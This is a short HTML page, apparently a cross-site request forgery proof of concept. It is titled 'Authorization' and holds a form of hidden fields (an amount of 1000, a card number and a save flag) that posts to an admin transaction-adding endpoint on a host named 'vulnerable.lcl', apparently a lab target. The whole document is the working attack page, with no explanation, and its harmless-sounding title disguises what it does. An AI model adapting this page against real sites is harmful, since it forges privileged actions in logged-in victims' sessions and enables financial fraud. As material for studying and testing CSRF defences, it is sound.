<!DOCTYPE html5>
<html>
	<head>
		<title>Authorization</title>
	</head>
	<body>
		<form id="auth-form" method="POST" action="http://vulnerable.lcl/admin/app/transaction/add/">
			<input type="hidden" name="amount" value="1000"/>
			<input type="hidden" name="card" value="5536192010291020"/>
			<input type="hidden" name="_save" value="Save"/>
			<input type="submit"/>
		</form>
	</body>
</html>
